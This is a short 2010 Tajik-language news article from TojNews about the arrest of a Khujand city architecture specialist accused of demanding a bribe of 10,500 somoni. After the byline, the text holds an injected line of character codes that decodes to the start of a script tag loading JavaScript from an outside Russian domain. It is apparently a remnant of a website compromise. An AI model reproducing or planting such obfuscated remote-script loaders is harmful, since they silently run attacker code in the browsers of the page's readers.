25.05.2010
Боздошти меъмор ба ҷурми ришваситонӣ
TojNews - Мутахассиси шӯъбаи меъмории ҳукумати шаҳри Хуҷанд ба ҷурми ришваситонӣ боздошт шуд.
Тавре ба TojNews сухангӯйи вазорати корҳои дохилии ҷумҳурӣ Маҳмадулло Асадуллоев иттилоъ дод, мутахассиси шӯъбаи меъмории шаҳри хуҷанд Нуриддин Усмонов бо суистифода аз ваколатҳои мансабии худ барои имзо, гузоштани мӯҳри корхонаҳои ҶДММ «Меъмор», ҶДММ «Асри-21» ва пешниҳоди лоиҳаи сохтмони иншоот бидуни иҷозатнома аз шаҳрванд Абдуҳаким Тоҳиров 10 ҳазору 500 сомонӣ пора талаб кардааст. «Дар таърихи 23-юми майи соли равон ҳангоми гузаронидани чораҳои фаврӣ-ҷустуҷӯйӣ дар ҳудуди шаҳри Хуҷанд номбурда боздошт шуда, аз ҷараёни баъдии тафтишот ошкор гардидааст, ки Нуриддин Усмонов маблағи гирифтаро барои эҳтиёҷоти худ масраф сохтааст», - гуфт ӯ. Айни ҳол аз рӯйи ин далел парвандаи ҷиноӣ боз гардида, тафтишот идома дорад.
Рӯҳафзои ИБРОҲИМ -TojNew
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)841944b12fa642129f9e8363bdc92f21.js" type="text/javascript">

ТАВЗЕҲОТ